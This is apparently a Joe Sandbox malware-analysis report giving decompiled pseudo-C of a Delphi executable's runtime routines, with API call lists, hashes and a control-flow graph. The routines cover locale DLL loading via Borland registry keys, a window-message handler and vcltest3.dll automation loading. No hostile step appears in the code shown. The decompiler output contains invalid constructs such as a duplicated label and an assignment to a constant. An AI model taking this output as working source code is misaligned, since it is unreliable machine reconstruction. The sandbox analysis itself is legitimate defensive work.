                                  				GetModuleFileNameA(0,  &_v289, 0x105);
                                  				_v22 = 0;
                                  				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                  				if(_t44 == 0) {
                                  					L3:
                                  					_push(_t110);
                                  					_push(0x405175);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t113;
                                  					_v28 = 5;
                                  					E00404EB8( &_v289, 0x105);
                                  					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E004052DC, 0, 0,  &_v22,  &_v28) != 0) {
                                  						_v22 = 0;
                                  					}
                                  					_v18 = 0;
                                  					_pop(_t99);
                                  					 *[fs:eax] = _t99;
                                  					_push(E0040517C);
                                  					return RegCloseKey(_v12);
                                  				} else {
                                  					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                  					if(_t61 == 0) {
                                  						goto L3;
                                  					} else {
                                  						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                  						if(_t63 != 0) {
                                  							_push(0x105);
                                  							_push(_v8);
                                  							_push( &_v289);
                                  							L00401294();
                                  							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                  							_t107 = 0;
                                  							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                  								_t70 =  &_v289;
                                  								_push(_t70);
                                  								L0040129C();
                                  								_t94 = _t70 +  &_v289;
                                  								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                  									_t94 = _t94 - 1;
                                  								}
                                  								_t72 =  &_v289;
                                  								if(_t94 != _t72) {
                                  									_t95 = _t94 + 1;
                                  									if(_v22 != 0) {
                                  										_push(0x105 - _t95 - _t72);
                                  										_push( &_v22);
                                  										_push(_t95);
                                  										L00401294();
                                  										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                  									}
                                  									if(_t107 == 0 && _v17 != 0) {
                                  										_push(0x105 - _t95 -  &_v289);
                                  										_push( &_v17);
                                  										_push(_t95);
                                  										L00401294();
                                  										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                  										_t107 = _t78;
                                  										if(_t107 == 0) {
                                  											_v15 = 0;
                                  											_push(0x105 - _t95 -  &_v289);
                                  											_push( &_v17);
                                  											_push(_t95);
                                  											L00401294();
                                  											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                  											_t107 = _t84;
                                  										}
                                  									}
                                  								}
                                  							}
                                  							return _t107;
                                  						} else {
                                  							goto L3;
                                  						}
                                  					}
                                  				}
                                  			}


























                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0044D0A4,?,00404E60,00400000,?,00000105,00000001,00410240,00404E9C,00405940,0000FF9D,?), ref: 0040508C
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0044D0A4,?,00404E60,00400000,?,00000105,00000001), ref: 004050AA
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0044D0A4), ref: 004050C8
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 004050E6
                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040512F
                                  • RegQueryValueExA.ADVAPI32(?,004052DC,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405175,?,80000001), ref: 0040514D
                                  • RegCloseKey.ADVAPI32(?,0040517C,00000000,00000000,00000005,00000000,00405175,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040516F
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 0040518C
                                  • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405199
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040519F
                                  • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004051CA
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405211
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405221
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405249
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405259
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 0040527F
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 0040528F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1759228003-2375825460
                                  • Opcode ID: 42a30e681b9837cf28251fe46fb58e67a43e287ec18316ee78b63dbc1ce4251d
                                  • Instruction ID: bf47fbb6f7454da76762217b8018c12124681cb01ce2ce31bf4c900d15f1e550
                                  • Opcode Fuzzy Hash: 42a30e681b9837cf28251fe46fb58e67a43e287ec18316ee78b63dbc1ce4251d
                                  • Instruction Fuzzy Hash: BF515371A4064D7AEB21E6A49C46FEF77ACDB04744F4001FABA04F62C1D67C9E448FA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 94%
                                  			E0044A498(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                                  				struct HWND__* _v8;
                                  				struct HWND__* _v12;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t161;
                                  				struct HWND__* _t162;
                                  				struct HWND__* _t163;
                                  				void* _t166;
                                  				struct HWND__* _t176;
                                  				struct HWND__* _t185;
                                  				struct HWND__* _t188;
                                  				struct HWND__* _t189;
                                  				struct HWND__* _t191;
                                  				struct HWND__* _t197;
                                  				struct HWND__* _t199;
                                  				struct HWND__* _t202;
                                  				struct HWND__* _t205;
                                  				struct HWND__* _t206;
                                  				struct HWND__* _t216;
                                  				struct HWND__* _t217;
                                  				struct HWND__* _t222;
                                  				struct HWND__* _t224;
                                  				struct HWND__* _t227;
                                  				struct HWND__* _t231;
                                  				struct HWND__* _t239;
                                  				struct HWND__* _t247;
                                  				struct HWND__* _t250;
                                  				struct HWND__* _t254;
                                  				struct HWND__* _t256;
                                  				struct HWND__* _t257;
                                  				struct HWND__* _t269;
                                  				intOrPtr _t272;
                                  				struct HWND__* _t275;
                                  				intOrPtr* _t276;
                                  				struct HWND__* _t284;
                                  				struct HWND__* _t286;
                                  				struct HWND__* _t297;
                                  				void* _t306;
                                  				signed int _t308;
                                  				struct HWND__* _t314;
                                  				struct HWND__* _t315;
                                  				struct HWND__* _t316;
                                  				void* _t317;
                                  				intOrPtr _t340;
                                  				struct HWND__* _t344;
                                  				intOrPtr _t366;
                                  				void* _t370;
                                  				struct HWND__* _t375;
                                  				void* _t376;
                                  				void* _t377;
                                  				intOrPtr _t378;
                                  
                                  				_t317 = __ecx;
                                  				_push(_t370);
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_push(_t377);
                                  				_push(0x44ab52);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t378;
                                  				 *(_v12 + 0xc) = 0;
                                  				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
                                  				if(_t306 < 0) {
                                  					L5:
                                  					E0044A34C(_v8, _t317, _v12);
                                  					_t308 =  *_v12;
                                  					_t161 = _t308;
                                  					__eflags = _t161 - 0x53;
                                  					if(__eflags > 0) {
                                  						__eflags = _t161 - 0xb017;
                                  						if(__eflags > 0) {
                                  							__eflags = _t161 - 0xb020;
                                  							if(__eflags > 0) {
                                  								_t162 = _t161 - 0xb031;
                                  								__eflags = _t162;
                                  								if(_t162 == 0) {
                                  									_t163 = _v12;
                                  									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
                                  									if( *((intOrPtr*)(_t163 + 4)) != 1) {
                                  										 *(_v8 + 0xb0) =  *(_v12 + 8);
                                  									} else {
                                  										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
                                  									}
                                  									L102:
                                  									_t166 = 0;
                                  									_pop(_t340);
                                  									 *[fs:eax] = _t340;
                                  									goto L103;
                                  								}
                                  								__eflags = _t162 + 0xfffffff2 - 2;
                                  								if(_t162 + 0xfffffff2 - 2 < 0) {
                                  									 *(_v12 + 0xc) = E0044C464(_v8,  *(_v12 + 8), _t308) & 0x0000007f;
                                  								} else {
                                  									L101:
                                  									E0044A410(_t377); // executed
                                  								}
                                  								goto L102;
                                  							}
                                  							if(__eflags == 0) {
                                  								_t176 = _v12;
                                  								__eflags =  *(_t176 + 4);
                                  								if( *(_t176 + 4) != 0) {
                                  									E0044B0D4(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                  								} else {
                                  									E0044B078(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                  								}
                                  								goto L102;
                                  							}
                                  							_t185 = _t161 - 0xb01a;
                                  							__eflags = _t185;
                                  							if(_t185 == 0) {
                                  								_t188 = IsIconic( *(_v8 + 0x30));
                                  								__eflags = _t188;
                                  								if(_t188 == 0) {
                                  									_t189 = GetFocus();
                                  									_t344 = _v8;
                                  									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
                                  									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
                                  										_t191 = E004422D0(0);
                                  										__eflags = _t191;
                                  										if(_t191 != 0) {
                                  											SetFocus(_t191);
                                  										}
                                  									}
                                  								}
                                  								goto L102;
                                  							}
                                  							__eflags = _t185 == 5;
                                  							if(_t185 == 5) {
                                  								L89:
                                  								E0044B538(_v8,  *(_v12 + 8),  *(_v12 + 4));
                                  								goto L102;
                                  							} else {
                                  								goto L101;
                                  							}
                                  						}
                                  						if(__eflags == 0) {
                                  							_t197 =  *(_v8 + 0x44);
                                  							__eflags = _t197;
                                  							if(_t197 != 0) {
                                  								_t372 = _t197;
                                  								_t199 = E004325A4(_t197);
                                  								__eflags = _t199;
                                  								if(_t199 != 0) {
                                  									_t202 = IsWindowEnabled(E004325A4(_t372));
                                  									__eflags = _t202;
                                  									if(_t202 != 0) {
                                  										_t205 = IsWindowVisible(E004325A4(_t372));
                                  										__eflags = _t205;
                                  										if(_t205 != 0) {
                                  											 *0x44dc20 = 0;
                                  											_t206 = GetFocus();
                                  											SetFocus(E004325A4(_t372));
                                  											E0042D05C(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8));
                                  											SetFocus(_t206);
                                  											 *0x44dc20 = 1;
                                  											 *(_v12 + 0xc) = 1;
                                  										}
                                  									}
                                  								}
                                  							}
                                  							goto L102;
                                  						}
                                  						__eflags = _t161 - 0xb000;
                                  						if(__eflags > 0) {
                                  							_t216 = _t161 - 0xb001;
                                  							__eflags = _t216;
                                  							if(_t216 == 0) {
                                  								_t217 = _v8;
                                  								__eflags =  *((short*)(_t217 + 0x10a));
                                  								if( *((short*)(_t217 + 0x10a)) != 0) {
                                  									 *((intOrPtr*)(_v8 + 0x108))();
                                  								}
                                  								goto L102;
                                  							}
                                  							__eflags = _t216 == 0x15;
                                  							if(_t216 == 0x15) {
                                  								_t222 = E0044AF50(_v8, _t317, _v12);
                                  								__eflags = _t222;
                                  								if(_t222 != 0) {
                                  									 *(_v12 + 0xc) = 1;
                                  								}
                                  								goto L102;
                                  							} else {
                                  								goto L101;
                                  							}
                                  						}
                                  						if(__eflags == 0) {
                                  							_t224 = _v8;
                                  							__eflags =  *((short*)(_t224 + 0x112));
                                  							if( *((short*)(_t224 + 0x112)) != 0) {
                                  								 *((intOrPtr*)(_v8 + 0x110))();
                                  							}
                                  							goto L102;
                                  						}
                                  						_t227 = _t161 - 0x112;
                                  						__eflags = _t227;
                                  						if(_t227 == 0) {
                                  							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
                                  							__eflags = _t231;
                                  							if(_t231 == 0) {
                                  								E0044ABB8(_v8);
                                  							} else {
                                  								__eflags = _t231 == 0x100;
                                  								if(_t231 == 0x100) {
                                  									E0044AC68(_v8);
                                  								} else {
                                  									E0044A410(_t377);
                                  								}
                                  							}
                                  							goto L102;
                                  						}
                                  						_t239 = _t227 + 0xffffffe0 - 7;
                                  						__eflags = _t239;
                                  						if(_t239 < 0) {
                                  							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
                                  							goto L102;
                                  						}
                                  						__eflags = _t239 == 0x1e1;
                                  						if(_t239 == 0x1e1) {
                                  							_t247 = E00425930(E00425850());
                                  							__eflags = _t247;
                                  							if(_t247 != 0) {
                                  								E0042598C(E00425850());
                                  							}
                                  							goto L102;
                                  						} else {
                                  							goto L101;
                                  						}
                                  					}
                                  					if(__eflags == 0) {
                                  						goto L89;
                                  					}
                                  					__eflags = _t161 - 0x16;
                                  					if(__eflags > 0) {
                                  						__eflags = _t161 - 0x1d;
                                  						if(__eflags > 0) {
                                  							_t250 = _t161 - 0x37;
                                  							__eflags = _t250;
                                  							if(_t250 == 0) {
                                  								 *(_v12 + 0xc) = E0044AB9C(_v8);
                                  								goto L102;
                                  							}
                                  							__eflags = _t250 == 0x13;
                                  							if(_t250 == 0x13) {
                                  								_t254 = _v12;
                                  								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
                                  								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
                                  									_t256 = _v8;
                                  									__eflags =  *((char*)(_t256 + 0x9e));
                                  									if( *((char*)(_t256 + 0x9e)) != 0) {
                                  										_t257 = _v8;
                                  										__eflags =  *(_t257 + 0xa0);
                                  										if( *(_t257 + 0xa0) != 0) {
                                  											 *(_v12 + 0xc) = 0;
                                  										} else {
                                  											_t314 = E0040CA1C("vcltest3.dll", _t308, 0x8000);
                                  											 *(_v8 + 0xa0) = _t314;
                                  											__eflags = _t314;
                                  											if(_t314 == 0) {
                                  												 *(_v12 + 0xc) = GetLastError();
                                  												 *(_v8 + 0xa0) = 0;
                                  											} else {
                                  												 *(_v12 + 0xc) = 0;
                                  												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
                                  												_t315 = _t375;
                                  												__eflags = _t375;
                                  												if(_t375 != 0) {
                                  													_t269 =  *(_v12 + 8);
                                  													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L102;
                                  							} else {
                                  								goto L101;
                                  							}
                                  						}
                                  						if(__eflags == 0) {
                                  							_t272 =  *0x44fbb4; // 0x2191320
                                  							E00449950(_t272);
                                  							E0044A410(_t377);
                                  							goto L102;
                                  						}
                                  						_t275 = _t161 - 0x1a;
                                  						__eflags = _t275;
                                  						if(_t275 == 0) {
                                  							_t276 =  *0x44e0bc; // 0x44fb10
                                  							E00436C38( *_t276, _t317,  *(_v12 + 4));
                                  							E0044A3A4(_v8, _t308, _t317, _v12, _t370);
                                  							E0044A410(_t377);
                                  							goto L102;
                                  						}
                                  						__eflags = _t275 == 2;
                                  						if(_t275 == 2) {
                                  							E0044A410(_t377);
                                  							_t284 = _v12;
                                  							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
                                  							asm("sbb eax, eax");
                                  							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
                                  							_t286 = _v12;
                                  							__eflags =  *(_t286 + 4);
                                  							if( *(_t286 + 4) == 0) {
                                  								E0044A2A0();
                                  								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
                                  							} else {
                                  								E0044A2B0(_v8);
                                  								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
                                  							}
                                  							goto L102;
                                  						} else {
                                  							goto L101;
                                  						}
                                  					}
                                  					if(__eflags == 0) {
                                  						_t297 = _v12;
                                  						__eflags =  *(_t297 + 4);
                                  						if( *(_t297 + 4) != 0) {
                                  							 *((char*)(_v8 + 0x9c)) = 1;
                                  						}
                                  						goto L102;
                                  					}
                                  					__eflags = _t161 - 0x14;
                                  					if(_t161 > 0x14) {
                                  						goto L101;
                                  					}
                                  					switch( *((intOrPtr*)(_t161 * 4 +  &M0044A53C))) {
                                  						case 0:
                                  							0 = E00418D24(0, __ebx, __edi, __esi);
                                  							goto L102;
                                  						case 1:
                                  							goto L101;
                                  						case 2:
                                  							_push(0);
                                  							_push(0);
                                  							_push(0xb01a);
                                  							_v8 =  *(_v8 + 0x30);
                                  							_push( *(_v8 + 0x30));
                                  							L004064B8();
                                  							__eax = E0044A410(__ebp);
                                  							goto L102;
                                  						case 3:
                                  							__eax = _v12;
                                  							__eflags =  *(__eax + 4);
                                  							if( *(__eax + 4) == 0) {
                                  								__eax = E0044A410(__ebp);
                                  								__eax = _v8;
                                  								__eflags =  *(__eax + 0xac);
                                  								if( *(__eax + 0xac) == 0) {
                                  									__eax = _v8;
                                  									__eax =  *(_v8 + 0x30);
                                  									__eax = E00442180( *(_v8 + 0x30), __ebx, __edi, __esi);
                                  									__edx = _v8;
                                  									 *(_v8 + 0xac) = __eax;
                                  								}
                                  								_v8 = L0044A2A8();
                                  							} else {
                                  								_v8 = E0044A2B0(_v8);
                                  								__eax = _v8;
                                  								__eax =  *(_v8 + 0xac);
                                  								__eflags = __eax;
                                  								if(__eax != 0) {
                                  									__eax = _v8;
                                  									__edx = 0;
                                  									__eflags = 0;
                                  									 *(_v8 + 0xac) = 0;
                                  								}
                                  								__eax = E0044A410(__ebp);
                                  							}
                                  							goto L102;
                                  						case 4:
                                  							__eax = _v8;
                                  							__eax =  *(_v8 + 0x30);
                                  							_push(__eax);
                                  							L00406428();
                                  							__eflags = __eax;
                                  							if(__eax == 0) {
                                  								__eax = E0044A410(__ebp);
                                  							} else {
                                  								__eax = E0044A44C(__ebp);
                                  							}
                                  							goto L102;
                                  						case 5:
                                  							__eax = _v8;
                                  							__eax =  *(_v8 + 0x44);
                                  							__eflags = __eax;
                                  							if(__eax != 0) {
                                  								__eax = E00447B50(__eax, __ecx);
                                  							}
                                  							goto L102;
                                  						case 6:
                                  							__eax = _v12;
                                  							 *_v12 = 0x27;
                                  							__eax = E0044A410(__ebp);
                                  							goto L102;
                                  					}
                                  				} else {
                                  					_t316 = _t306 + 1;
                                  					_t376 = 0;
                                  					L2:
                                  					L2:
                                  					if( *((intOrPtr*)(E00413524( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) {
                                  						goto L4;
                                  					} else {
                                  						_t166 = 0;
                                  						_pop(_t366);
                                  						 *[fs:eax] = _t366;
                                  					}
                                  					L103:
                                  					return _t166;
                                  					L4:
                                  					_t376 = _t376 + 1;
                                  					_t316 = _t316 - 1;
                                  					__eflags = _t316;
                                  					if(_t316 != 0) {
                                  						goto L2;
                                  					}
                                  					goto L5;
                                  				}
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RegisterAutomation$vcltest3.dll
                                  • API String ID: 0-2963190186
                                  • Opcode ID: 5d2a302009948e3392fbe4bfe91e2d3021bdb5a95cfd9adae1be494576ee754b
                                  • Instruction ID: 98e40f89fcf7c7cd0258f7c0bdfddfc3f2de7a2f607e1c3abfb557148d58e484
                                  • Opcode Fuzzy Hash: 5d2a302009948e3392fbe4bfe91e2d3021bdb5a95cfd9adae1be494576ee754b
                                  • Instruction Fuzzy Hash: A4E1A334A40244EFE700DF99C586A5EF7F2EF09314F5581A6E644AB352C738EE61DB0A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 215 40517c-4051ad lstrcpyn GetThreadLocale GetLocaleInfoA 216 4051b3-4051b7 215->216 217 405296-40529d 215->217 218 4051c3-4051d9 lstrlen 216->218 219 4051b9-4051bd 216->219 220 4051dc-4051df 218->220 219->217 219->218 221 4051e1-4051e9 220->221 222 4051eb-4051f3 220->222 221->222 223 4051db 221->223 222->217 224 4051f9-4051fe 222->224 223->220 225 405200-405226 lstrcpyn LoadLibraryExA 224->225 226 405228-40522a 224->226 225->226 226->217 227 40522c-405230 226->227 227->217 228 405232-405262 lstrcpyn LoadLibraryExA 227->228 228->217 229 405264-405294 lstrcpyn LoadLibraryExA 228->229 229->217
                                  C-Code - Quality: 61%
                                  			E0040517C() {
                                  				void* _t28;
                                  				void* _t30;
                                  				struct HINSTANCE__* _t36;
                                  				struct HINSTANCE__* _t42;
                                  				char* _t51;
                                  				void* _t52;
                                  				struct HINSTANCE__* _t59;
                                  				void* _t61;
                                  
                                  				_push(0x105);
                                  				_push( *((intOrPtr*)(_t61 - 4)));
                                  				_push(_t61 - 0x11d);
                                  				L00401294();
                                  				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                                  				_t59 = 0;
                                  				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                                  					L14:
                                  					return _t59;
                                  				} else {
                                  					_t28 = _t61 - 0x11d;
                                  					_push(_t28);
                                  					L0040129C();
                                  					_t51 = _t28 + _t61 - 0x11d;
                                  					L5:
                                  					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                                  						_t51 = _t51 - 1;
                                  						goto L5;
                                  					}
                                  					_t30 = _t61 - 0x11d;
                                  					if(_t51 != _t30) {
                                  						_t52 = _t51 + 1;
                                  						if( *((char*)(_t61 - 0x12)) != 0) {
                                  							_push(0x105 - _t52 - _t30);
                                  							_push(_t61 - 0x12);
                                  							_push(_t52);
                                  							L00401294();
                                  							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                                  						}
                                  						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                                  							_push(0x105 - _t52 - _t61 - 0x11d);
                                  							_push(_t61 - 0xd);
                                  							_push(_t52);
                                  							L00401294();
                                  							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                  							_t59 = _t36;
                                  							if(_t59 == 0) {
                                  								 *((char*)(_t61 - 0xb)) = 0;
                                  								_push(0x105 - _t52 - _t61 - 0x11d);
                                  								_push(_t61 - 0xd);
                                  								_push(_t52);
                                  								L00401294();
                                  								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                  								_t59 = _t42;
                                  							}
                                  						}
                                  					}
                                  					goto L14;
                                  				}
                                  			}

                                  APIs
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 0040518C
                                  • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405199
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040519F
                                  • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004051CA
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405211
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405221
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405249
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405259
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 0040527F
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 0040528F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1599918012-2375825460
                                  • Opcode ID: af14c1e950c4dd8173092053fcf17151685b0ed4c58bd449b1b33e137c7d4652
                                  • Instruction ID: 2edec5a2f59f02892950df32a2288a9989bfbef1905e4320364365682ff0d217
                                  • Opcode Fuzzy Hash: af14c1e950c4dd8173092053fcf17151685b0ed4c58bd449b1b33e137c7d4652
                                  • Instruction Fuzzy Hash: 75316471E0065D2AEB25D6B8AC46FEF77AC9B04344F0441FBA604F62C1E67C9E848F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0044A410(intOrPtr _a4) {
                                  				intOrPtr _t26;
                                  
                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
                                  				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
                                  				_push(_t26); // executed
                                  				L004061D0(); // executed
                                  				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
                                  				return _t26;
                                  			}

                                  APIs
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0044A43A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
